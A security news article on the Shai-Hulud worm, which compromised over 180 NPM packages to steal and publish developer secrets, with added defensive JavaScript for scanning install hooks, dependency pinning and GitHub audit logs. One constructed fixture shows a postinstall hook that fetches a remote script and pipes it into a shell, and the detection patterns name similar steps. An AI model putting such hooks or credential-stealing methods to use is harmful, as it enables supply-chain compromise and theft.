Shai-Hulud Supply Chain Attack: Worm Compromises Over 180 NPM Packages to Steal Secrets


Major Supply Chain Attack Affects Over 180 NPM Packages

A recent supply chain attack has sent ripples through the software development community, impacting more than 180 packages on the Node Package Manager (NPM) registry. The incident, identified as the Shai-Hulud attack, uses self-replicating malware to steal sensitive data and to turn previously private repositories into public ones.

Understanding the Attack

On September 15, Daniel dos Santos Pereira, a senior software engineer at Loka, raised the alarm about the initial signs of this attack. It began the previous day, when fewer than a dozen malicious packages were published. The scope of the attack expanded rapidly, however, reaching around 50 compromised package versions that same day. By September 16, the number had surged to over 180, according to warnings from Ox Security.

Affected Packages

Among the notable packages affected by this attack are well-known libraries such as @ctrl/tinycolor, which garners over 2 million downloads weekly, and ngx-bootstrap, with approximately 300,000 downloads. Other impacted packages include ng2-file-upload and various products from CrowdStrike, which were promptly removed following the identification of the attack.

The compromised packages contained a post-install script that downloads the TruffleHog secret scanning tool. The script used it to hunt for sensitive information on the host, including environment variables and cloud credentials obtainable through the Instance Metadata Service (IMDS).
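The install-time hook is the foothold, so a practical first check is to look at what every installed package runs during installation. The following is an added example, not code from the article or from any of the vendors it cites: it scans package manifests for npm lifecycle hooks and flags the traits described above (fetching TruffleHog, touching the IMDS address, piping downloads into a shell). The manifests, package names and indicator patterns are constructed for illustration and are this example's own heuristics, not a published signature.

```javascript
// Added example: flag install-time lifecycle hooks with suspicious traits.
// Sample manifests are constructed; they are not real packages.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristics based on the behaviour described in the article (assumptions,
// not a vendor signature): secret-scanner download, IMDS access, remote
// download inside a hook, piping into a shell, decoding an embedded blob.
const INDICATORS = [
  { name: 'fetches-trufflehog', re: /trufflehog/i },
  { name: 'queries-imds', re: /169\.254\.169\.254|metadata\.google\.internal/i },
  { name: 'remote-download-in-hook', re: /\b(curl|wget)\b/ },
  { name: 'pipes-to-shell', re: /\|\s*(ba)?sh\b/ },
  { name: 'base64-decode', re: /base64\s+(-d|--decode)|Buffer\.from\([^)]*'base64'\)/ },
];

// Return one finding per lifecycle hook defined in a manifest, with the
// indicator names that matched its command (an empty list means a hook
// exists but matched nothing; e.g. a normal native build step).
function scanManifest(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const hits = INDICATORS.filter(i => i.re.test(cmd)).map(i => i.name);
    findings.push({ pkg: `${pkg.name}@${pkg.version}`, hook, cmd, hits });
  }
  return findings;
}

function scanAll(manifests) {
  return manifests.flatMap(scanManifest);
}

// Keep only hooks that matched at least one indicator.
function riskyHooks(findings) {
  return findings.filter(f => f.hits.length > 0);
}

// Constructed samples: a hook that downloads a secret scanner and pipes it
// into a shell, a legitimate native-addon build hook, and a package with no
// lifecycle hooks at all. In real use, read these from node_modules/*/package.json.
const SAMPLE_MANIFESTS = [
  { name: 'example-colour-lib', version: '4.1.1',
    scripts: { postinstall: 'curl -sL https://example.invalid/trufflehog | sh && node bundle.js' } },
  { name: 'example-native-addon', version: '2.0.0',
    scripts: { install: 'node-gyp rebuild' } },
  { name: 'example-plain', version: '1.0.0', scripts: { test: 'mocha' } },
];

const report = scanAll(SAMPLE_MANIFESTS);
console.log(JSON.stringify(riskyHooks(report), null, 2));
```

Hooks with no indicator hits still appear in the full report so a reviewer can see every package that executes code at install time; only the matched ones are printed. Running installs with scripts disabled (`npm install --ignore-scripts`) is the blunt version of the same control.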

Malicious Behavior

One of the most alarming features of the Shai-Hulud attack is the script’s ability to validate the credentials it collects. When it finds GitHub tokens, the malware goes a step further, creating public repositories labeled “Shai-Hulud Migration” and dumping the stolen secrets into them. It also sets up a GitHub Actions workflow that exfiltrates secrets to a hardcoded webhook, which was later disabled after it exceeded its callback limits.

Cybersecurity firm Socket has reported over 700 public repositories on GitHub carrying the Shai-Hulud Migration label, appearing in step with the attack’s progression.

The methodical way the attack unfolded resembles the earlier s1ngularity supply chain breach, and it targeted known victims of that earlier incident. What sets Shai-Hulud apart is its ability to exploit existing NPM tokens: it not only spreads but also updates any packages under the control of compromised maintainers, amplifying its reach.

Self-Propagating Nature

According to Wiz, the Shai-Hulud attack behaves like a self-propagating worm. When a compromised package encounters additional NPM tokens in a victim’s environment, it automatically publishes malicious versions of any packages those tokens can reach, widening the outbreak.

StepSecurity’s analysis indicates that the attack specifically targets Linux and macOS execution environments and skips Windows machines.

Payload Variations

Security experts at JFrog have noted that several variations of the data-stealing payload were injected into the harmful package versions. The code has been observed attempting to extract GitHub, NPM, AWS, and Google Cloud credentials, along with Atlassian keys and Datadog API keys. Some iterations adapted over the course of the attack: one focuses on Azure credentials, while others hide the created repository from public view.

Data Breach Impact

The fallout from this attack is significant. According to GitGuardian, the breach has led to the public exposure of 278 secrets, 90 of them sourced directly from local machines and 188 through compromised workflows. Although many of these credentials were revoked quickly, some, particularly GitHub API tokens, remained active, leaving room for further compromise.

Recommendations for Users

To mitigate the risk of infection, developers should be wary of any NPM package with a newly released version that has no corresponding update on GitHub. It is prudent to pin dependencies to prevent unexpected package changes. Wiz notes that although no new Shai-Hulud repositories have been created recently, the risk persists, because compromised accounts could still be used to launch further attacks.
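Both recommendations above can be checked mechanically. The following is an added example, not code from the article or from Wiz: the first function takes the `time` map that the npm registry returns in a package document (assumed to have been fetched separately) together with the tags of the package’s source repository, and flags versions published within a recent window that have no matching tag; the second lists dependency specifiers in a package.json that are not pinned to an exact version. The registry timestamps, tag list, package names and reference date are all constructed.

```javascript
// Added example: spot npm versions that lack a matching source tag, and
// dependency specifiers that are not pinned. All inputs are constructed.

const DAY_MS = 24 * 60 * 60 * 1000;

// Shape of the npm registry's "time" field for a package document: a
// publish timestamp per version plus "created" and "modified" (assumption:
// fetched by the caller; this sample is made up).
const SAMPLE_REGISTRY_TIME = {
  created: '2021-03-01T10:00:00.000Z',
  modified: '2025-09-15T23:45:00.000Z',
  '4.1.0': '2025-06-02T09:12:00.000Z',
  '4.1.1': '2025-06-20T15:30:00.000Z',
  '4.1.2': '2025-09-15T23:45:00.000Z',
};
// Constructed tag list from the package's source repository; 4.1.2 has none.
const SAMPLE_GIT_TAGS = ['v4.0.9', 'v4.1.0', 'v4.1.1'];
// Fixed "now" so the example is reproducible.
const SAMPLE_NOW = new Date('2025-09-16T12:00:00.000Z');

function normalizeTag(tag) {
  return tag.replace(/^v/, '');
}

// Versions published within the last `windowDays` that have no tag in the
// source repository, newest first.
function findUntaggedRecentVersions(timeMap, gitTags, now, windowDays) {
  const tagged = new Set(gitTags.map(normalizeTag));
  const out = [];
  for (const [version, published] of Object.entries(timeMap)) {
    if (version === 'created' || version === 'modified') continue;
    const ageDays = (now - new Date(published)) / DAY_MS;
    if (ageDays <= windowDays && !tagged.has(version)) {
      out.push({ version, published, ageDays: Number(ageDays.toFixed(2)) });
    }
  }
  return out.sort((a, b) => a.ageDays - b.ageDays);
}

// Constructed package.json with one pinned and two unpinned specifiers.
const SAMPLE_PACKAGE_JSON = {
  dependencies: { 'example-colour-lib': '^4.1.0', 'example-plain': '1.0.0' },
  devDependencies: { 'example-tool': 'latest' },
};

// Anything that is not an exact semver string (ranges, tags, wildcards)
// can resolve to a newly published version on the next install.
function unpinnedDependencies(pkg) {
  const exact = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$/;
  const out = [];
  for (const field of ['dependencies', 'devDependencies']) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      if (!exact.test(spec)) out.push({ field, name, spec });
    }
  }
  return out;
}

console.log('untagged recent versions:',
  findUntaggedRecentVersions(SAMPLE_REGISTRY_TIME, SAMPLE_GIT_TAGS, SAMPLE_NOW, 7));
console.log('unpinned dependencies:', unpinnedDependencies(SAMPLE_PACKAGE_JSON));
```

A version that appears on the registry with no tag or release on the source repository is not proof of compromise (some projects never tag), but it is exactly the signal the article recommends watching for, and the unpinned-specifier list tells you which entries in your own manifest would pull such a version in automatically.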

Vigilance Is Key

To help identify potential compromises, users are encouraged to audit their GitHub account activity. This includes checking for newly created repositories or branches and looking for repositories named Shai-Hulud or Shai-Hulud Migration that mention their organization. Regular review of GitHub audit logs can also help detect suspicious API calls.
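The audit review described above can be scripted against an export of the organization’s GitHub audit log. The following is an added example, not code from the article or from GitHub: it flags repository creations whose name matches the Shai-Hulud label, new or changed repositories that are public, and workflow events carrying the same name, then reports any actor who produced several such events in a short window. The sample entries are constructed; their field and action names (`@timestamp`, `action`, `actor`, `repo`, `visibility`, `repo.create`, `repo.access`) follow the GitHub audit log format as the author understands it and should be treated as an assumption to check against a real export.

```javascript
// Added example: flag Shai-Hulud-style activity in a GitHub audit log export.
// Sample events are constructed; field and action names are an assumption.

const NAME_RE = /shai[-_ ]?hulud/i;

// Constructed export: 2025-09-16, one normal private repo, then one actor
// creating a public "shai-hulud-migration" repo, flipping another repo to
// public and adding a similarly named workflow within two minutes.
const SAMPLE_AUDIT_LOG = [
  { '@timestamp': 1757980800000, action: 'repo.create', actor: 'dev-alice',
    repo: 'example-org/api-client', visibility: 'private' },
  { '@timestamp': 1757984400000, action: 'repo.create', actor: 'dev-bob',
    repo: 'example-org/shai-hulud-migration-api-client', visibility: 'public' },
  { '@timestamp': 1757984460000, action: 'repo.access', actor: 'dev-bob',
    repo: 'example-org/internal-tooling', visibility: 'public' },
  { '@timestamp': 1757984520000, action: 'workflows.created_workflow_run', actor: 'dev-bob',
    repo: 'example-org/internal-tooling', name: 'shai-hulud-workflow' },
  { '@timestamp': 1757988000000, action: 'repo.create', actor: 'dev-carol',
    repo: 'example-org/docs-site', visibility: 'private' },
];

// One finding per event that matches at least one of the traits the
// article describes; each finding lists every reason it matched.
function flagAuditEvents(events) {
  const findings = [];
  for (const e of events) {
    const reasons = [];
    if (e.action === 'repo.create' && NAME_RE.test(e.repo)) reasons.push('repo-named-shai-hulud');
    if (e.action === 'repo.create' && e.visibility === 'public') reasons.push('new-public-repo');
    if (e.action === 'repo.access' && e.visibility === 'public') reasons.push('repo-made-public');
    if (e.action.startsWith('workflows.') && NAME_RE.test(e.name || '')) reasons.push('workflow-named-shai-hulud');
    if (reasons.length) {
      findings.push({ ts: new Date(e['@timestamp']).toISOString(), actor: e.actor, repo: e.repo, reasons });
    }
  }
  return findings;
}

// Actors with at least `threshold` findings inside any `windowMs` span:
// a stolen token used by a script produces a burst, a human rarely does.
function actorsWithBurst(findings, windowMs, threshold) {
  const byActor = new Map();
  for (const f of findings) {
    if (!byActor.has(f.actor)) byActor.set(f.actor, []);
    byActor.get(f.actor).push(Date.parse(f.ts));
  }
  const out = [];
  for (const [actor, times] of byActor) {
    times.sort((a, b) => a - b);
    for (let i = 0; i + threshold - 1 < times.length; i++) {
      if (times[i + threshold - 1] - times[i] <= windowMs) { out.push(actor); break; }
    }
  }
  return out;
}

const findings = flagAuditEvents(SAMPLE_AUDIT_LOG);
console.log(JSON.stringify(findings, null, 2));
console.log('burst actors:', actorsWithBurst(findings, 10 * 60 * 1000, 2));
```

A single new public repository is routine; the combination of a Shai-Hulud-named repository, a visibility flip and a new workflow from the same actor inside a few minutes is the pattern worth paging on, and the actor it points at is the account whose tokens should be rotated first.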

If any signs of compromise are found, users should revoke and re-issue their GitHub and NPM tokens, SSH keys, and API keys, and review the secrets held in environment variables before reinstalling the affected packages.

The Ongoing Threat

Shai-Hulud is the third major incident to hit the NPM ecosystem in a short span, following the s1ngularity incident and the compromise of Josh Junon (Qix), whose packages collectively see billions of downloads each week.

The consistent advice from cybersecurity professionals is to understand your own software environment. Organizations should proactively audit dependencies, maintain Software Bills of Materials (SBOMs), and strengthen authentication and access controls to counter this growing class of attack.

In an era where attacks on the supply chain are becoming more commonplace, preparedness and vigilance are essential for developers and organizations alike. The Shai-Hulud attack serves as a stark reminder of the need for robust security measures to safeguard sensitive information within the software development ecosystem.
